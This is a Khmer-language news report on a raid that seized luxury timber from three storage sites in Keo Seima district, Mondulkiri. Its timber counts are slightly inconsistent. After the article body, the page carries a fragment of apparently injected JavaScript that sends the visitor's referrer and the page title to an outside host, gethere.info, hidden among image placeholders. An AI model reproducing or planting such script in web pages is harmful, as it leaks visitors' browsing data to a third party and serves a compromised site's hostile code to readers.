កំលាំងសមត្ថកិច្ចចំម្រុះស្រុកកែវសីមា​ ចុះ បង្ក្រាបទីតាំងស្តុកឈើប្រណិតចំនួន៣កន្លែងរឹបអូសឈេី៤៧៧ដុំ

ខេត្តមណ្ឌលគិរី៖ កំលាំងសមត្ថកិច្ចចំម្រុះស្រុកកែវសីមា ចុះ បង្ក្រាបទីតាំងស្តុកឈើប្រណិតចំនួន៣កន្លែងផ្សេងគ្នារយៈពេលពីថ្ងៃរឹបអូសនឹងប្រមូលបានឈើប្រណិតបានចំនួន៤៧៥ដុំរយះពេល២ថ្ងៃជាប់គ្នានៅភូមិអូរអាមឃុំស្រែខ្ទុមស្រុកកែវសីមាខេត្តមណ្ឌលគិរី លោក ជុយ សុឃាង នាយផ្នែករដ្ឋបាលព្រៃឈេីស្រុកកែវសីមា បានបញ្ជាក់ប្រាប់ភ្នា ក់ងារព័ត៍មានយេីងឲ្យដឹង នៅល្ងាចថ្ងៃទី២៩កក្កដានេះថា ទីតាំងស្តុកឈើប្រណិតចំនួន៣កន្លែងត្រូវបានសមត្ថកិច្ចចំរុុះដឹកនាំដោយលោក សូ សុវិជ្ជា ព្រះរាជអាជ្ញាអមសាលាដំបូងខេត្តមណ្ឌលគិរី បានចុះព្រួតពិនិត្យនៅទីតាំងចំនួន៣ ស្ថិតនៅភូមិអូរអាមឃុំស្រែខ្ទុមស្រុកកែវសីមា ប្រមូលឈើបានចំនួន៤៥៣ដុំនៅព្រឹកថ្ងៃទី២៩ខែកក្កដាឆ្នាំ២០១៦ នេះបានធ្វើការដឹកមករក្សាទុកនៅផ្នែករដ្ឋបាលព្រៃឈើស្រុកកែវសីមារួចហើយ ដោយឡែកឈើចំនួន២២ដុំនឹងរថយន្តឡង់គ្រិះស័រ១គ្រឿងទៀតមន្ត្រីររដ្ឋបាលព្រៃឈើផ្នែកកែវសីមាបង្ក្រាបបានកាលពីល្ងាចថ្ងៃទី២៨កក្កដា។

 

បច្ចុប្បន្នរថយន្តព្រមទាំងឈើជាវត្ថុតាងទាំងអស់យកមករក្សាទុកនៅផ្នែករដ្ឋបាលព្រៃឈើស្រុកកែវសីមាដើម្បីចាត់ការតាមច្បាប់។

image image image images.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More